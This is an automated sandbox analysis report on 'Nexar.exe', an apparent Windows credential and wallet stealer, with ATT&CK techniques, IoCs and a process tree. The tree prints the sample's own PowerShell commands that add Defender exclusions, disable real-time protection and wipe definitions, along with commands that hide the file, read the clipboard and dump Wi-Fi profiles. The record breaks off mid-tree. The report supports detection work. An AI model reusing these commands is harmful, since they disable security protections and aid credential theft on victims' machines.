e107b2a22642b7d3e4637d7530745f9e557cf979d3710136729eb5bad060928c

Analysis

max time kernel
600s
max time network
593s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
11-11-2024 13:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Nexar.exe
Size

7.6MB
MD5

6d421ffe35a880f4a3eb4d89f7bd6118
SHA1

601806ba8aafc0e5ba71bfac460a04bd8b8aaf19
SHA256

e107b2a22642b7d3e4637d7530745f9e557cf979d3710136729eb5bad060928c
SHA512

ed16f533dab2862543466ce054e70838d64822564644bf1c095e347f6bfcc79d7bb937855a9d51970101ded4bdf3ec34c7a39b82464f2d91e440b8397b10bdd0
SSDEEP

196608:jUgVVEBr+wwfI9jUC2gYBYv3vbW2+iITx1U6n5:xVVEBqvIH2gYBgDWJTnz5

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2936	powershell.exe
2696	powershell.exe
3064	powershell.exe
3932	powershell.exe
2484	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Nexar.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
768	cmd.exe
4144	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
3984	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
4844	Nexar.exe
4844	Nexar.exe
4844	Nexar.exe
4844	Nexar.exe
4844	Nexar.exe
4844	Nexar.exe
4844	Nexar.exe
4844	Nexar.exe
4844	Nexar.exe
4844	Nexar.exe
4844	Nexar.exe
4844	Nexar.exe
4844	Nexar.exe
4844	Nexar.exe
4844	Nexar.exe
4844	Nexar.exe
4844	Nexar.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
1	discord.com
5	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
2984	tasklist.exe
128	tasklist.exe
4696	tasklist.exe
4620	tasklist.exe
4772	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2176	cmd.exe

UPX packed file 61 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001900000002aac2-21.dat	upx
behavioral1/memory/4844-25-0x00007FF8C2050000-0x00007FF8C2715000-memory.dmp	upx
behavioral1/files/0x001900000002aab5-27.dat	upx
behavioral1/files/0x001900000002aac0-29.dat	upx
behavioral1/memory/4844-32-0x00007FF8DD300000-0x00007FF8DD30F000-memory.dmp	upx
behavioral1/memory/4844-30-0x00007FF8D7170000-0x00007FF8D7195000-memory.dmp	upx
behavioral1/files/0x001900000002aabf-34.dat	upx
behavioral1/files/0x001900000002aac1-35.dat	upx
behavioral1/files/0x001900000002aabb-47.dat	upx
behavioral1/files/0x001900000002aabc-48.dat	upx
behavioral1/files/0x001b00000002aab4-41.dat	upx
behavioral1/files/0x001900000002aac7-40.dat	upx
behavioral1/files/0x001900000002aac5-38.dat	upx
behavioral1/files/0x001900000002aaba-46.dat	upx
behavioral1/files/0x001900000002aab9-45.dat	upx
behavioral1/files/0x001900000002aab8-44.dat	upx
behavioral1/files/0x001900000002aab7-43.dat	upx
behavioral1/files/0x001900000002aab6-42.dat	upx
behavioral1/files/0x001900000002aac6-39.dat	upx
behavioral1/memory/4844-54-0x00007FF8D7140000-0x00007FF8D716D000-memory.dmp	upx
behavioral1/memory/4844-56-0x00007FF8DC720000-0x00007FF8DC73A000-memory.dmp	upx
behavioral1/memory/4844-58-0x00007FF8D7110000-0x00007FF8D7134000-memory.dmp	upx
behavioral1/memory/4844-60-0x00007FF8D3EA0000-0x00007FF8D401F000-memory.dmp	upx
behavioral1/memory/4844-62-0x00007FF8D9120000-0x00007FF8D9139000-memory.dmp	upx
behavioral1/memory/4844-64-0x00007FF8D8F50000-0x00007FF8D8F5D000-memory.dmp	upx
behavioral1/memory/4844-66-0x00007FF8D7060000-0x00007FF8D7093000-memory.dmp	upx
behavioral1/memory/4844-72-0x00007FF8D01B0000-0x00007FF8D06E3000-memory.dmp	upx
behavioral1/memory/4844-74-0x00007FF8D7170000-0x00007FF8D7195000-memory.dmp	upx
behavioral1/memory/4844-71-0x00007FF8D6F90000-0x00007FF8D705E000-memory.dmp	upx
behavioral1/memory/4844-70-0x00007FF8C2050000-0x00007FF8C2715000-memory.dmp	upx
behavioral1/memory/4844-77-0x00007FF8D6F70000-0x00007FF8D6F84000-memory.dmp	upx
behavioral1/memory/4844-76-0x00007FF8DD300000-0x00007FF8DD30F000-memory.dmp	upx
behavioral1/memory/4844-80-0x00007FF8D8F40000-0x00007FF8D8F4D000-memory.dmp	upx
behavioral1/memory/4844-79-0x00007FF8D7140000-0x00007FF8D716D000-memory.dmp	upx
behavioral1/memory/4844-83-0x00007FF8D3D80000-0x00007FF8D3E9A000-memory.dmp	upx
behavioral1/memory/4844-82-0x00007FF8DC720000-0x00007FF8DC73A000-memory.dmp	upx
behavioral1/memory/4844-107-0x00007FF8D7110000-0x00007FF8D7134000-memory.dmp	upx
behavioral1/memory/4844-120-0x00007FF8D3EA0000-0x00007FF8D401F000-memory.dmp	upx
behavioral1/memory/4844-302-0x00007FF8D7060000-0x00007FF8D7093000-memory.dmp	upx
behavioral1/memory/4844-305-0x00007FF8D6F90000-0x00007FF8D705E000-memory.dmp	upx
behavioral1/memory/4844-306-0x00007FF8D01B0000-0x00007FF8D06E3000-memory.dmp	upx
behavioral1/memory/4844-340-0x00007FF8C2050000-0x00007FF8C2715000-memory.dmp	upx
behavioral1/memory/4844-354-0x00007FF8D3D80000-0x00007FF8D3E9A000-memory.dmp	upx
behavioral1/memory/4844-346-0x00007FF8D3EA0000-0x00007FF8D401F000-memory.dmp	upx
behavioral1/memory/4844-341-0x00007FF8D7170000-0x00007FF8D7195000-memory.dmp	upx
behavioral1/memory/4844-357-0x00007FF8C2050000-0x00007FF8C2715000-memory.dmp	upx
behavioral1/memory/4844-410-0x00007FF8D8F40000-0x00007FF8D8F4D000-memory.dmp	upx
behavioral1/memory/4844-421-0x00007FF8D6F90000-0x00007FF8D705E000-memory.dmp	upx
behavioral1/memory/4844-422-0x00007FF8D01B0000-0x00007FF8D06E3000-memory.dmp	upx
behavioral1/memory/4844-420-0x00007FF8D7060000-0x00007FF8D7093000-memory.dmp	upx
behavioral1/memory/4844-419-0x00007FF8D8F50000-0x00007FF8D8F5D000-memory.dmp	upx
behavioral1/memory/4844-418-0x00007FF8D9120000-0x00007FF8D9139000-memory.dmp	upx
behavioral1/memory/4844-417-0x00007FF8D3EA0000-0x00007FF8D401F000-memory.dmp	upx
behavioral1/memory/4844-416-0x00007FF8D7110000-0x00007FF8D7134000-memory.dmp	upx
behavioral1/memory/4844-415-0x00007FF8DC720000-0x00007FF8DC73A000-memory.dmp	upx
behavioral1/memory/4844-414-0x00007FF8D7140000-0x00007FF8D716D000-memory.dmp	upx
behavioral1/memory/4844-413-0x00007FF8DD300000-0x00007FF8DD30F000-memory.dmp	upx
behavioral1/memory/4844-412-0x00007FF8D7170000-0x00007FF8D7195000-memory.dmp	upx
behavioral1/memory/4844-411-0x00007FF8D3D80000-0x00007FF8D3E9A000-memory.dmp	upx
behavioral1/memory/4844-409-0x00007FF8D6F70000-0x00007FF8D6F84000-memory.dmp	upx
behavioral1/memory/4844-397-0x00007FF8C2050000-0x00007FF8C2715000-memory.dmp	upx

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4812	cmd.exe
3488	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4600	netsh.exe
2868	cmd.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1236	WMIC.exe
3800	WMIC.exe
1316	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2952	systeminfo.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133758068608764568"	chrome.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3488	PING.EXE

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
2936	powershell.exe
3064	powershell.exe
2936	powershell.exe
3064	powershell.exe
2696	powershell.exe
2696	powershell.exe
4144	powershell.exe
4144	powershell.exe
4592	powershell.exe
4592	powershell.exe
4144	powershell.exe
4592	powershell.exe
3932	powershell.exe
3932	powershell.exe
1300	powershell.exe
1300	powershell.exe
2484	powershell.exe
2484	powershell.exe
3444	powershell.exe
3444	powershell.exe
4016	chrome.exe
4016	chrome.exe
2320	chrome.exe
2320	chrome.exe
2320	chrome.exe
2320	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
4016	chrome.exe
4016	chrome.exe
4016	chrome.exe
4016	chrome.exe
4016	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2984	tasklist.exe
Token: SeDebugPrivilege	2936	powershell.exe
Token: SeDebugPrivilege	3064	powershell.exe
Token: SeIncreaseQuotaPrivilege	4996	WMIC.exe
Token: SeSecurityPrivilege	4996	WMIC.exe
Token: SeTakeOwnershipPrivilege	4996	WMIC.exe
Token: SeLoadDriverPrivilege	4996	WMIC.exe
Token: SeSystemProfilePrivilege	4996	WMIC.exe
Token: SeSystemtimePrivilege	4996	WMIC.exe
Token: SeProfSingleProcessPrivilege	4996	WMIC.exe
Token: SeIncBasePriorityPrivilege	4996	WMIC.exe
Token: SeCreatePagefilePrivilege	4996	WMIC.exe
Token: SeBackupPrivilege	4996	WMIC.exe
Token: SeRestorePrivilege	4996	WMIC.exe
Token: SeShutdownPrivilege	4996	WMIC.exe
Token: SeDebugPrivilege	4996	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4996	WMIC.exe
Token: SeRemoteShutdownPrivilege	4996	WMIC.exe
Token: SeUndockPrivilege	4996	WMIC.exe
Token: SeManageVolumePrivilege	4996	WMIC.exe
Token: 33	4996	WMIC.exe
Token: 34	4996	WMIC.exe
Token: 35	4996	WMIC.exe
Token: 36	4996	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4996	WMIC.exe
Token: SeSecurityPrivilege	4996	WMIC.exe
Token: SeTakeOwnershipPrivilege	4996	WMIC.exe
Token: SeLoadDriverPrivilege	4996	WMIC.exe
Token: SeSystemProfilePrivilege	4996	WMIC.exe
Token: SeSystemtimePrivilege	4996	WMIC.exe
Token: SeProfSingleProcessPrivilege	4996	WMIC.exe
Token: SeIncBasePriorityPrivilege	4996	WMIC.exe
Token: SeCreatePagefilePrivilege	4996	WMIC.exe
Token: SeBackupPrivilege	4996	WMIC.exe
Token: SeRestorePrivilege	4996	WMIC.exe
Token: SeShutdownPrivilege	4996	WMIC.exe
Token: SeDebugPrivilege	4996	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4996	WMIC.exe
Token: SeRemoteShutdownPrivilege	4996	WMIC.exe
Token: SeUndockPrivilege	4996	WMIC.exe
Token: SeManageVolumePrivilege	4996	WMIC.exe
Token: 33	4996	WMIC.exe
Token: 34	4996	WMIC.exe
Token: 35	4996	WMIC.exe
Token: 36	4996	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1236	WMIC.exe
Token: SeSecurityPrivilege	1236	WMIC.exe
Token: SeTakeOwnershipPrivilege	1236	WMIC.exe
Token: SeLoadDriverPrivilege	1236	WMIC.exe
Token: SeSystemProfilePrivilege	1236	WMIC.exe
Token: SeSystemtimePrivilege	1236	WMIC.exe
Token: SeProfSingleProcessPrivilege	1236	WMIC.exe
Token: SeIncBasePriorityPrivilege	1236	WMIC.exe
Token: SeCreatePagefilePrivilege	1236	WMIC.exe
Token: SeBackupPrivilege	1236	WMIC.exe
Token: SeRestorePrivilege	1236	WMIC.exe
Token: SeShutdownPrivilege	1236	WMIC.exe
Token: SeDebugPrivilege	1236	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1236	WMIC.exe
Token: SeRemoteShutdownPrivilege	1236	WMIC.exe
Token: SeUndockPrivilege	1236	WMIC.exe
Token: SeManageVolumePrivilege	1236	WMIC.exe
Token: 33	1236	WMIC.exe
Token: 34	1236	WMIC.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
4016	chrome.exe
4016	chrome.exe
4016	chrome.exe
4016	chrome.exe
4016	chrome.exe
4016	chrome.exe
4016	chrome.exe
4016	chrome.exe
4016	chrome.exe
4016	chrome.exe
4016	chrome.exe
4016	chrome.exe
4016	chrome.exe
4016	chrome.exe
4016	chrome.exe
4016	chrome.exe
4016	chrome.exe
4016	chrome.exe
4016	chrome.exe
4016	chrome.exe
4016	chrome.exe
4016	chrome.exe
4016	chrome.exe
4016	chrome.exe
4016	chrome.exe
4016	chrome.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
4016	chrome.exe
4016	chrome.exe
4016	chrome.exe
4016	chrome.exe
4016	chrome.exe
4016	chrome.exe
4016	chrome.exe
4016	chrome.exe
4016	chrome.exe
4016	chrome.exe
4016	chrome.exe
4016	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3144 wrote to memory of 4844	3144	Nexar.exe	77
PID 3144 wrote to memory of 4844	3144	Nexar.exe	77
PID 4844 wrote to memory of 4196	4844	Nexar.exe	78
PID 4844 wrote to memory of 4196	4844	Nexar.exe	78
PID 4844 wrote to memory of 4748	4844	Nexar.exe	79
PID 4844 wrote to memory of 4748	4844	Nexar.exe	79
PID 4844 wrote to memory of 3476	4844	Nexar.exe	80
PID 4844 wrote to memory of 3476	4844	Nexar.exe	80
PID 4844 wrote to memory of 3752	4844	Nexar.exe	82
PID 4844 wrote to memory of 3752	4844	Nexar.exe	82
PID 4844 wrote to memory of 5012	4844	Nexar.exe	86
PID 4844 wrote to memory of 5012	4844	Nexar.exe	86
PID 4196 wrote to memory of 2936	4196	cmd.exe	88
PID 4196 wrote to memory of 2936	4196	cmd.exe	88
PID 3752 wrote to memory of 2984	3752	cmd.exe	89
PID 3752 wrote to memory of 2984	3752	cmd.exe	89
PID 4748 wrote to memory of 3064	4748	cmd.exe	90
PID 4748 wrote to memory of 3064	4748	cmd.exe	90
PID 3476 wrote to memory of 4780	3476	cmd.exe	91
PID 3476 wrote to memory of 4780	3476	cmd.exe	91
PID 5012 wrote to memory of 4996	5012	cmd.exe	92
PID 5012 wrote to memory of 4996	5012	cmd.exe	92
PID 4844 wrote to memory of 644	4844	Nexar.exe	94
PID 4844 wrote to memory of 644	4844	Nexar.exe	94
PID 644 wrote to memory of 3672	644	cmd.exe	96
PID 644 wrote to memory of 3672	644	cmd.exe	96
PID 4844 wrote to memory of 1876	4844	Nexar.exe	97
PID 4844 wrote to memory of 1876	4844	Nexar.exe	97
PID 1876 wrote to memory of 1736	1876	cmd.exe	99
PID 1876 wrote to memory of 1736	1876	cmd.exe	99
PID 4844 wrote to memory of 796	4844	Nexar.exe	100
PID 4844 wrote to memory of 796	4844	Nexar.exe	100
PID 796 wrote to memory of 1236	796	cmd.exe	102
PID 796 wrote to memory of 1236	796	cmd.exe	102
PID 4844 wrote to memory of 2184	4844	Nexar.exe	103
PID 4844 wrote to memory of 2184	4844	Nexar.exe	103
PID 2184 wrote to memory of 3800	2184	cmd.exe	105
PID 2184 wrote to memory of 3800	2184	cmd.exe	105
PID 4844 wrote to memory of 2176	4844	Nexar.exe	106
PID 4844 wrote to memory of 2176	4844	Nexar.exe	106
PID 4844 wrote to memory of 1032	4844	Nexar.exe	107
PID 4844 wrote to memory of 1032	4844	Nexar.exe	107
PID 1032 wrote to memory of 2696	1032	cmd.exe	110
PID 1032 wrote to memory of 2696	1032	cmd.exe	110
PID 2176 wrote to memory of 3400	2176	cmd.exe	111
PID 2176 wrote to memory of 3400	2176	cmd.exe	111
PID 4844 wrote to memory of 1724	4844	Nexar.exe	112
PID 4844 wrote to memory of 1724	4844	Nexar.exe	112
PID 4844 wrote to memory of 1984	4844	Nexar.exe	113
PID 4844 wrote to memory of 1984	4844	Nexar.exe	113
PID 4844 wrote to memory of 772	4844	Nexar.exe	116
PID 4844 wrote to memory of 772	4844	Nexar.exe	116
PID 4844 wrote to memory of 768	4844	Nexar.exe	118
PID 4844 wrote to memory of 768	4844	Nexar.exe	118
PID 4844 wrote to memory of 4760	4844	Nexar.exe	120
PID 4844 wrote to memory of 4760	4844	Nexar.exe	120
PID 1984 wrote to memory of 128	1984	cmd.exe	122
PID 1984 wrote to memory of 128	1984	cmd.exe	122
PID 1724 wrote to memory of 4696	1724	cmd.exe	123
PID 1724 wrote to memory of 4696	1724	cmd.exe	123
PID 4844 wrote to memory of 4584	4844	Nexar.exe	124
PID 4844 wrote to memory of 4584	4844	Nexar.exe	124
PID 4844 wrote to memory of 2868	4844	Nexar.exe	125
PID 4844 wrote to memory of 2868	4844	Nexar.exe	125

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3400	attrib.exe
1252	attrib.exe
3664	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Nexar.exe
"C:\Users\Admin\AppData\Local\Temp\Nexar.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3144
- C:\Users\Admin\AppData\Local\Temp\Nexar.exe
  "C:\Users\Admin\AppData\Local\Temp\Nexar.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nexar.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4196
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nexar.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4748
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('please try again', 0, 'Error', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3476
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('please try again', 0, 'Error', 0+16);close()"
      4⤵
      PID:4780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3752
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5012
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:644
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:3672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1876
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:1736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:796
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:1236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2184
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Nexar.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:2176
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Nexar.exe"
      4⤵
      Views/modifies file attributes
      PID:3400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1032
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1724
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1984
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:772
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:2524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:768
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:4144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4760
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4584
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:2868
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:4636
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:2052
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:4420
- - C:\Windows\system32\cmd.exe
